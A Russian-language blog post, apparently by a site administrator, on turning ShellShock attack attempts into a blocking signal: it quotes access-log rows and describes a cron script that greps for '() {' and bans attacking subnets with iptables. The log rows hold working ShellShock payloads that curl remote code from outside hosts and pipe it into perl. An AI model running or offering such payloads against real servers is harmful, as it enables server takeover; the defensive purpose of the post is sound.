Как использовать дыру ShellShock для укрепления безопасности собственного сайта

После того, как в Bash нашли позорнейшую дыру ShellShock, сайты атакуются десятки и сотни раз в день.

Честное слово, надоело в логах каждый день видеть вариации вот такого:

select path,url,hostname from accesslog where url like '%()%';


+----------------------+--------------------------------------------------------------------------+----------------+
| path | url | hostname |
+----------------------+--------------------------------------------------------------------------+----------------+
| node | () { :; }; curl httр://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl | 186.202.183.68 |
| node | () { :; }; curl httр://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl | 186.202.183.68 |
| node | () { :; }; curl httр://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl | 186.202.183.68 |
| node | () { :; }; curl httр://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl | 78.129.145.208 |
| node | () { :; }; curl httр://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl | 78.129.145.208 |
| node | () { :; }; curl httр://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl | 78.129.145.208 |
| node | () { :; }; curl httр://new-energo0.1gb.ru/cpan_root | perl | 208.131.138.50 |
| cgi-bin | () { :; }; curl httр://new-energo0.1gb.ru/cpan_root | perl | 208.131.138.50 |
| cgi-sys | () { :; }; curl httр://new-energo0.1gb.ru/cpan_root | perl | 208.131.138.50 |
| cgi-bin-sdb/printenv | () { :; }; curl httр://new-energo0.1gb.ru/cpan_root | perl | 208.131.138.50 |
| cgi-mod/index.cgi | () { :; }; curl httр://new-energo0.1gb.ru/cpan_root | perl | 208.131.138.50 |
+----------------------+--------------------------------------------------------------------------+----------------+
11 rows in set (0.00 sec)


Почему-то принято делить хакеров на White Hat и Black Hat. По-моему, правильнее делить их на настоящих хакеров и каккеров-имбецилов. Первые сами находят уязвимости, вторые читают о них в журналах для пионеров типа «Каккер», месяц не могут врубиться, зато потом еще 5 лет будут пытаться воспользоваться дырой. Вот и с ShellShock: казалось бы, месяц прошел, все давно пропатчились, а количество атак только возрастает, причем чудовищными темпами. Но не будем отвлекаться.

Как известно, во всем можно отыскать как положительную, так и отрицательную сторону. В случае ShellShock со вредом все понятно — всякие упыри стали ломать сервера, чтобы потом с них атаковать, DDoS-ить и рассылать спам. Но должна же быть и хорошая сторона в появлении ShellShock? И эта сторона есть!

Давайте рассуждать. Чтобы попытаться проэксплуатировать дыру, каккер должен отправить данные, содержащие неизменяемый фрагмент. Как минимум, это "() {". С другой стороны, станет ли кто-нибудь отсылать данные, содержащие эту комбинацию без намерения что-то взломать? Очевидно, что нет. Делаем вывод, что получение "() {" может однозначно трактоваться как сигнал о преднамеренной попытке взлома. Получается, что каккеры сами выдают свои прокси и взломанные промежуточные сайты. Нам остается только собрать реестр таких IP и надежно их забанить.

Для этого пишем простой скрип, использующий всего 4 команды: cat, grep, cut и iptables. Суть проста: берется журнал посещений web-сервера, прогоняется через grep, с помощью cut вычленяется столбец с ip-адресом и все это отдается в iptables для блокировки. Лучше сразу всей подсетью /24. Иронично, что скрип на Bash.

Добавляем в cron и готово — теперь каккеры сами себя блокируют, чем значительно повышают общую защищенность сайта.